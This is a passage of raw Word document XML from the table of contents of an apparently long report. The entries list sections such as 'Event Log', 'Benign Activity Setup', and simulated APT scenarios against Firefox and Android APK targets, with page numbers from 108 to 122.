              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600127" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.6.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600127 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>108</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51E42246" w14:textId="714B19B1" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600128" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.7</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600128 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>110</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3803B8C1" w14:textId="7EB6758F" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600129" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.8</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13:01 -- MARPLE 1 -- Firefox DNS Drakon APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600129 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>113</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01D38CCC" w14:textId="7980DAF3" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600130" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.8.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130 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>113</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BCD28EE" w14:textId="667D99EF" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600131" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.8.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131 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>113</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78A7FC7D" w14:textId="634AE933" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600132" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.8.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600132 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>114</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F8E49EF" w14:textId="683D7812" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600133" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.8.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600133 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70B73FD8" w14:textId="64F67A4D" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600134" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.9</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14:27 -- TA1 ClearScope 1 and 2 -- MyApp APK AppStarter APK Micro APT (Failed)</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600134 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4119427F" w14:textId="0C342877" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600135" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.9.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135 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0118D3E3" w14:textId="47FEFF0B" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600136" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.9.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136 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30856576" w14:textId="0856BC41" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600137" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.9.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600137 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="089229FA" w14:textId="0C3F5850" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600138" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.9.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600138 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>121</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A610D15" w14:textId="295BEC24" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600139" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.9.5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600139 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>122</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="283FDC19" w14:textId="0A2E01D8" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
